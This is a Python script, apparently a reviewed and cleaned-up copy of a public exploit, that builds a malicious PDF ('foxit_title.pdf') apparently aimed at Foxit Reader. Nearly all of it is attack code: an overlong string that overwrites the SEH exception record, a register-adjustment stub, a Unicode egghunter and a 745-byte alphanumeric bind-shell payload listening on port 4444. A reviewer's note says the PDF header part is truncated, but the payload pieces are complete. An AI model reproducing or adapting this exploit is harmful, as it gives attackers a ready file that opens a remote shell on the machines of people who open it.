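#!/usr/bin/python
"""Write foxit_title.pdf, a proof-of-concept PDF with an overlong string field.

The generated file is the concatenation of, in order:

  preamble   PDF header, a linearization dictionary, a 46-entry xref table and
             the start of a trailer dictionary (hex-escaped below, decoded in
             the comments)
  lead       538 filler bytes that run up to the SEH record
  nseh/seh   the two-byte pairs that overwrite the exception registration record
  l33tmath   a short stub the author labels as EAX adjustment, with 0x6D bytes
             the author labels as alignment between the instruction bytes
  filler     104 bytes, then the egghunter, 104 bytes again, the "w00tw00t"
             tag and the bindshell payload the egghunter searches for
  trailer    padding, a marker string and ")>>\\nendobj", which closes the PDF
             literal string, the dictionary and the object

The filename suggests the overlong field is the document title; this copy does
not show the object that holds it, so that is unconfirmed.

NOTE(review): the copy of this script reviewed here is cut off inside the
preamble literal (it ends with the partial escape "\\x7" right after "/P" in the
trailer dictionary).  The literal is closed after the last complete byte and
the partial escape is dropped; whatever followed it in the original is missing,
so the generated file is incomplete.

Fixes relative to the original: every payload piece is a bytes literal and the
file is opened in binary mode -- under Python 3 the original str literals would
have been UTF-8-encoded on write (the 0xE2..0xD3 and 0xE7 bytes become two
bytes each), and on Windows text mode would turn every 0x0A into CR LF, which
shifts every offset the xref table claims.  The file is also now actually
closed: the original ended with `evil.close`, a bare method reference, not a
call.
"""

preamble = (
    b"\x25\x50\x44\x46\x2D\x31\x2E\x34\x0A"                          # %PDF-1.4\n
    b"\x25\xE2\xE3\xCF\xD3\x0A"                                      # %<binary marker>\n
    b"\x38\x31\x20\x30\x20\x6F\x62\x6A\x0A"                          # 81 0 obj\n
    # <</Linearized 1/L 213756/O 83/E 141631/N 21/T 212089/H [ 1216 699]>>\n
    b"\x3C\x3C\x2F\x4C\x69\x6E\x65\x61\x72\x69\x7A\x65\x64\x20\x31\x2F\x4C\x20"
    b"\x32\x31\x33\x37\x35\x36\x2F\x4F\x20\x38\x33\x2F\x45\x20\x31\x34\x31\x36"
    b"\x33\x31\x2F\x4E\x20\x32\x31\x2F\x54\x20\x32\x31\x32\x30\x38\x39\x2F\x48"
    b"\x20\x5B\x20\x31\x32\x31\x36\x20\x36\x39\x39\x5D\x3E\x3E\x0A"
    b"\x65\x6E\x64\x6F\x62\x6A\x0A"                                  # endobj\n
    b"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0A"      # 13 spaces + \n
    b"\x78\x72\x65\x66\x0A"                                          # xref\n
    b"\x38\x31\x20\x34\x36\x0A"                                      # 81 46\n (46 entries follow)
    # xref entries, each "NNNNNNNNNN 00000 n\n"
    b"\x30\x30\x30\x30\x30\x30\x30\x30\x31\x36\x20\x30\x30\x30\x30\x30\x20\x6E\x0A"  # 0000000016
    b"\x30\x30\x30\x30\x30\x30\x31\x39\x31\x35\x20\x30\x30\x30\x30\x30\x20\x6E\x0A"  # 0000001915
    b"\x30\x30\x30\x30\x30\x30\x32\x30\x38\x34\x20\x30\x30\x30\x30\x30\x20\x6E\x0A"  # 0000002084
    b"\x30\x30\x30\x30\x30\x30\x32\x33\x31\x31\x20\x30\x30\x30\x30\x30\x20\x6E\x0A"  # 0000002311
    b"\x30\x30\x30\x30\x30\x30\x32\x33\x36\x33\x20\x30\x30\x30\x30\x30\x20\x6E\x0A"  # 0000002363
    b"\x30\x30\x30\x30\x30\x30\x32\x34\x37\x30\x20\x30\x30\x30\x30\x30\x20\x6E\x0A"  # 0000002470
    b"\x30\x30\x30\x30\x30\x32\x33\x37\x37\x30\x20\x30\x30\x30\x30\x30\x20\x6E\x0A"  # 0000023770
    b"\x30\x30\x30\x30\x30\x32\x33\x39\x35\x37\x20\x30\x30\x30\x30\x30\x20\x6E\x0A"  # 0000023957
    b"\x30\x30\x30\x30\x30\x32\x34\x35\x30\x33\x20\x30\x30\x30\x30\x30\x20\x6E\x0A"  # 0000024503
    b"\x30\x30\x30\x30\x30\x32\x34\x38\x38\x33\x20\x30\x30\x30\x30\x30\x20\x6E\x0A"  # 0000024883
    b"\x30\x30\x30\x30\x30\x34\x38\x36\x38\x38\x20\x30\x30\x30\x30\x30\x20\x6E\x0A"  # 0000048688
    b"\x30\x30\x30\x30\x30\x34\x38\x38\x37\x30\x20\x30\x30\x30\x30\x30\x20\x6E\x0A"  # 0000048870
    b"\x30\x30\x30\x30\x30\x34\x39\x34\x39\x30\x20\x30\x30\x30\x30\x30\x20\x6E\x0A"  # 0000049490
    b"\x30\x30\x30\x30\x30\x34\x39\x39\x34\x32\x20\x30\x30\x30\x30\x30\x20\x6E\x0A"  # 0000049942
    b"\x30\x30\x30\x30\x30\x35\x30\x34\x38\x31\x20\x30\x30\x30\x30\x30\x20\x6E\x0A"  # 0000050481
    b"\x30\x30\x30\x30\x30\x35\x30\x39\x33\x34\x20\x30\x30\x30\x30\x30\x20\x6E\x0A"  # 0000050934
    b"\x30\x30\x30\x30\x30\x35\x31\x33\x37\x30\x20\x30\x30\x30\x30\x30\x20\x6E\x0A"  # 0000051370
    b"\x30\x30\x30\x30\x30\x35\x31\x38\x33\x38\x20\x30\x30\x30\x30\x30\x20\x6E\x0A"  # 0000051838
    b"\x30\x30\x30\x30\x30\x35\x32\x32\x39\x30\x20\x30\x30\x30\x30\x30\x20\x6E\x0A"  # 0000052290
    b"\x30\x30\x30\x30\x30\x35\x32\x38\x35\x37\x20\x30\x30\x30\x30\x30\x20\x6E\x0A"  # 0000052857
    b"\x30\x30\x30\x30\x30\x35\x33\x33\x31\x34\x20\x30\x30\x30\x30\x30\x20\x6E\x0A"  # 0000053314
    b"\x30\x30\x30\x30\x30\x35\x33\x35\x32\x36\x20\x30\x30\x30\x30\x30\x20\x6E\x0A"  # 0000053526
    b"\x30\x30\x30\x30\x30\x37\x32\x36\x35\x39\x20\x30\x30\x30\x30\x30\x20\x6E\x0A"  # 0000072659
    b"\x30\x30\x30\x30\x30\x37\x32\x38\x35\x33\x20\x30\x30\x30\x30\x30\x20\x6E\x0A"  # 0000072853
    b"\x30\x30\x30\x30\x30\x37\x33\x34\x30\x31\x20\x30\x30\x30\x30\x30\x20\x6E\x0A"  # 0000073401
    b"\x30\x30\x30\x30\x30\x37\x33\x37\x38\x36\x20\x30\x30\x30\x30\x30\x20\x6E\x0A"  # 0000073786
    b"\x30\x30\x30\x30\x30\x37\x35\x32\x32\x38\x20\x30\x30\x30\x30\x30\x20\x6E\x0A"  # 0000075228
    b"\x30\x30\x30\x30\x30\x37\x35\x34\x31\x33\x20\x30\x30\x30\x30\x30\x20\x6E\x0A"  # 0000075413
    b"\x30\x30\x30\x30\x30\x37\x35\x37\x30\x35\x20\x30\x30\x30\x30\x30\x20\x6E\x0A"  # 0000075705
    b"\x30\x30\x30\x30\x30\x37\x35\x38\x36\x31\x20\x30\x30\x30\x30\x30\x20\x6E\x0A"  # 0000075861
    b"\x30\x30\x30\x30\x30\x37\x36\x30\x35\x39\x20\x30\x30\x30\x30\x30\x20\x6E\x0A"  # 0000076059
    b"\x30\x30\x30\x30\x30\x37\x36\x35\x36\x35\x20\x30\x30\x30\x30\x30\x20\x6E\x0A"  # 0000076565
    b"\x30\x30\x30\x30\x30\x37\x36\x39\x31\x34\x20\x30\x30\x30\x30\x30\x20\x6E\x0A"  # 0000076914
    b"\x30\x30\x30\x30\x30\x39\x32\x31\x35\x32\x20\x30\x30\x30\x30\x30\x20\x6E\x0A"  # 0000092152
    b"\x30\x30\x30\x30\x30\x39\x32\x33\x34\x32\x20\x30\x30\x30\x30\x30\x20\x6E\x0A"  # 0000092342
    b"\x30\x30\x30\x30\x30\x39\x33\x30\x31\x33\x20\x30\x30\x30\x30\x30\x20\x6E\x0A"  # 0000093013
    b"\x30\x30\x30\x30\x30\x39\x33\x35\x32\x32\x20\x30\x30\x30\x30\x30\x20\x6E\x0A"  # 0000093522
    b"\x30\x30\x30\x30\x31\x30\x36\x33\x37\x31\x20\x30\x30\x30\x30\x30\x20\x6E\x0A"  # 0000106371
    b"\x30\x30\x30\x30\x31\x30\x36\x35\x36\x36\x20\x30\x30\x30\x30\x30\x20\x6E\x0A"  # 0000106566
    b"\x30\x30\x30\x30\x31\x30\x37\x31\x38\x31\x20\x30\x30\x30\x30\x30\x20\x6E\x0A"  # 0000107181
    b"\x30\x30\x30\x30\x31\x30\x37\x36\x33\x35\x20\x30\x30\x30\x30\x30\x20\x6E\x0A"  # 0000107635
    b"\x30\x30\x30\x30\x31\x31\x39\x35\x38\x36\x20\x30\x30\x30\x30\x30\x20\x6E\x0A"  # 0000119586
    b"\x30\x30\x30\x30\x31\x31\x39\x37\x38\x37\x20\x30\x30\x30\x30\x30\x20\x6E\x0A"  # 0000119787
    b"\x30\x30\x30\x30\x31\x32\x30\x33\x30\x36\x20\x30\x30\x30\x30\x30\x20\x6E\x0A"  # 0000120306
    b"\x30\x30\x30\x30\x31\x32\x30\x36\x37\x39\x20\x30\x30\x30\x30\x30\x20\x6E\x0A"  # 0000120679
    b"\x30\x30\x30\x30\x30\x30\x31\x32\x31\x36\x20\x30\x30\x30\x30\x30\x20\x6E\x0A"  # 0000001216
    b"\x74\x72\x61\x69\x6C\x65\x72\x0A"                              # trailer\n
    b"\x3C\x3C\x2F\x53\x69\x7A\x65\x20\x31\x32\x37\x2F\x50"          # <</Size 127/P
    # NOTE(review): the source copy is truncated here (a dangling "\x7" followed
    # the "/P" byte); the remainder of the trailer dictionary and everything
    # after it are not available.
)

# 202 byte unicode egghunter - EAX base register
egghunter = (
    b"PPYA4444444444QATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAI"
    b"AJ11AIAIAXA58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABABAB30APB944JB1V3Q7ZKOLO"
    b"0B0R1ZKR0X8MNNOLKU0Z2TJO6X2W00002T4KJZ6O2U9Z6O2U9W4K7WKO9WKPA"
)

# Bindshell port 4444 - Does not need to be Unicode friendly. Simple Alpha will do. - 745 bytes
bindshell = (
    b"\x50\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x56"
    b"\x54\x58\x33\x30\x56\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30"
    b"\x41\x30\x30\x41\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42"
    b"\x32\x42\x42\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a\x49\x4b"
    b"\x4c\x4b\x58\x4b\x39\x45\x50\x45\x50\x45\x50\x43\x50\x4c\x49"
    b"\x4a\x45\x46\x51\x4e\x32\x45\x34\x4c\x4b\x51\x42\x46\x50\x4c"
    b"\x4b\x46\x32\x44\x4c\x4c\x4b\x50\x52\x42\x34\x4c\x4b\x42\x52"
    b"\x47\x58\x44\x4f\x4e\x57\x50\x4a\x46\x46\x46\x51\x4b\x4f\x50"
    b"\x31\x4f\x30\x4e\x4c\x47\x4c\x45\x31\x43\x4c\x44\x42\x46\x4c"
    b"\x51\x30\x49\x51\x48\x4f\x44\x4d\x45\x51\x49\x57\x4b\x52\x4a"
    b"\x50\x50\x52\x50\x57\x4c\x4b\x50\x52\x44\x50\x4c\x4b\x50\x42"
    b"\x47\x4c\x45\x51\x4e\x30\x4c\x4b\x51\x50\x42\x58\x4b\x35\x49"
    b"\x50\x43\x44\x50\x4a\x43\x31\x4e\x30\x46\x30\x4c\x4b\x47\x38"
    b"\x45\x48\x4c\x4b\x51\x48\x47\x50\x45\x51\x4e\x33\x4d\x33\x47"
    b"\x4c\x50\x49\x4c\x4b\x47\x44\x4c\x4b\x43\x31\x4e\x36\x50\x31"
    b"\x4b\x4f\x46\x51\x4f\x30\x4e\x4c\x4f\x31\x48\x4f\x44\x4d\x43"
    b"\x31\x49\x57\x50\x38\x4b\x50\x44\x35\x4c\x34\x44\x43\x43\x4d"
    b"\x4c\x38\x47\x4b\x43\x4d\x51\x34\x42\x55\x4a\x42\x51\x48\x4c"
    b"\x4b\x46\x38\x47\x54\x45\x51\x48\x53\x45\x36\x4c\x4b\x44\x4c"
    b"\x50\x4b\x4c\x4b\x51\x48\x45\x4c\x43\x31\x49\x43\x4c\x4b\x43"
    b"\x34\x4c\x4b\x43\x31\x4e\x30\x4c\x49\x47\x34\x51\x34\x47\x54"
    b"\x51\x4b\x51\x4b\x43\x51\x50\x59\x51\x4a\x46\x31\x4b\x4f\x4b"
    b"\x50\x51\x48\x51\x4f\x51\x4a\x4c\x4b\x42\x32\x4a\x4b\x4d\x56"
    b"\x51\x4d\x43\x58\x47\x43\x47\x42\x43\x30\x43\x30\x42\x48\x44"
    b"\x37\x44\x33\x50\x32\x51\x4f\x51\x44\x45\x38\x50\x4c\x43\x47"
    b"\x47\x56\x44\x47\x4b\x4f\x48\x55\x48\x38\x4c\x50\x43\x31\x45"
    b"\x50\x43\x30\x51\x39\x48\x44\x50\x54\x50\x50\x42\x48\x46\x49"
    b"\x4d\x50\x42\x4b\x45\x50\x4b\x4f\x4e\x35\x50\x50\x50\x50\x46"
    b"\x30\x46\x30\x51\x50\x50\x50\x47\x30\x50\x50\x43\x58\x4a\x4a"
    b"\x44\x4f\x49\x4f\x4b\x50\x4b\x4f\x49\x45\x4c\x49\x49\x57\x46"
    b"\x51\x49\x4b\x46\x33\x43\x58\x45\x52\x43\x30\x44\x51\x51\x4c"
    b"\x4c\x49\x4a\x46\x42\x4a\x44\x50\x50\x56\x46\x37\x45\x38\x4f"
    b"\x32\x49\x4b\x47\x47\x45\x37\x4b\x4f\x4e\x35\x51\x43\x46\x37"
    b"\x45\x38\x4f\x47\x4b\x59\x46\x58\x4b\x4f\x4b\x4f\x4e\x35\x50"
    b"\x53\x51\x43\x51\x47\x45\x38\x44\x34\x4a\x4c\x47\x4b\x4b\x51"
    b"\x4b\x4f\x48\x55\x51\x47\x4b\x39\x48\x47\x42\x48\x43\x45\x42"
    b"\x4e\x50\x4d\x43\x51\x4b\x4f\x49\x45\x42\x48\x43\x53\x42\x4d"
    b"\x42\x44\x45\x50\x4c\x49\x4d\x33\x50\x57\x50\x57\x46\x37\x50"
    b"\x31\x4a\x56\x42\x4a\x42\x32\x51\x49\x46\x36\x4a\x42\x4b\x4d"
    b"\x42\x46\x49\x57\x47\x34\x51\x34\x47\x4c\x45\x51\x43\x31\x4c"
    b"\x4d\x50\x44\x51\x34\x42\x30\x4f\x36\x43\x30\x47\x34\x50\x54"
    b"\x46\x30\x46\x36\x51\x46\x51\x46\x50\x46\x46\x36\x50\x4e\x51"
    b"\x46\x50\x56\x50\x53\x50\x56\x43\x58\x44\x39\x48\x4c\x47\x4f"
    b"\x4d\x56\x4b\x4f\x4e\x35\x4b\x39\x4b\x50\x50\x4e\x50\x56\x51"
    b"\x56\x4b\x4f\x46\x50\x45\x38\x45\x58\x4c\x47\x45\x4d\x45\x30"
    b"\x4b\x4f\x4e\x35\x4f\x4b\x4a\x50\x4e\x55\x4e\x42\x46\x36\x42"
    b"\x48\x49\x36\x4a\x35\x4f\x4d\x4d\x4d\x4b\x4f\x48\x55\x47\x4c"
    b"\x43\x36\x43\x4c\x45\x5a\x4d\x50\x4b\x4b\x4b\x50\x43\x45\x43"
    b"\x35\x4f\x4b\x47\x37\x44\x53\x42\x52\x42\x4f\x42\x4a\x45\x50"
    b"\x51\x43\x4b\x4f\x4e\x35\x44\x4a\x41\x41"
)

# Filler up to the SEH record, then the overwritten record itself.
lead = b"\x41" * 538
nseh = b"\x41\x6d"  # Walk over SEH
seh = b"\x2F\x4D"   # p/p/r from app binary

# Stub the author labels as EAX adjustment; the interleaved 0x6D bytes are
# labelled "Align" by the author.
l33tmath = b"\x41"
l33tmath += b"\x6D"          # Align
l33tmath += b"\x58"          # POP EAX
l33tmath += b"\x6D"          # Align
l33tmath += b"\x58"          # POP EAX
l33tmath += b"\x6D"          # Align
l33tmath += b"\x58"          # POP EAX
l33tmath += b"\x6D"          # Align
l33tmath += b"\x35\xFF\x01"  # XOR EAX,2000FF00
l33tmath += b"\x6D"          # Align
l33tmath += b"\x35\xF0\x01"  # XOR EAX,2000F000
l33tmath += b"\x6D"          # Align
l33tmath += b"\x50"          # PUSH EAX
l33tmath += b"\x6D"          # Align
l33tmath += b"\xC3"          # RETN
l33tmath += b"\x6D"          # Align

filler = b"\x41" * 104
egg = b"w00tw00t"  # tag the egghunter scans memory for; the bindshell follows it

# Padding, a marker string, then ")>>\nendobj" to close the PDF string,
# dictionary and object.
trailer = b"\x44" * 8507
trailer += b"\xE7\xE7"
trailer += b"dookie was here: breaking your pdf reader application"
trailer += b"\x29\x3E\x3E\x0A\x65\x6E\x64\x6F\x62\x6A"

sploit = (
    preamble + lead + nseh + seh + l33tmath + filler + egghunter
    + filler + egg + bindshell + trailer
)

filename = "foxit_title.pdf"
# Binary mode: no newline translation and no text encoding of the payload bytes.
# The context manager closes the file; the original `evil.close` never called it.
with open(filename, "wb") as evil:
    evil.write(sploit)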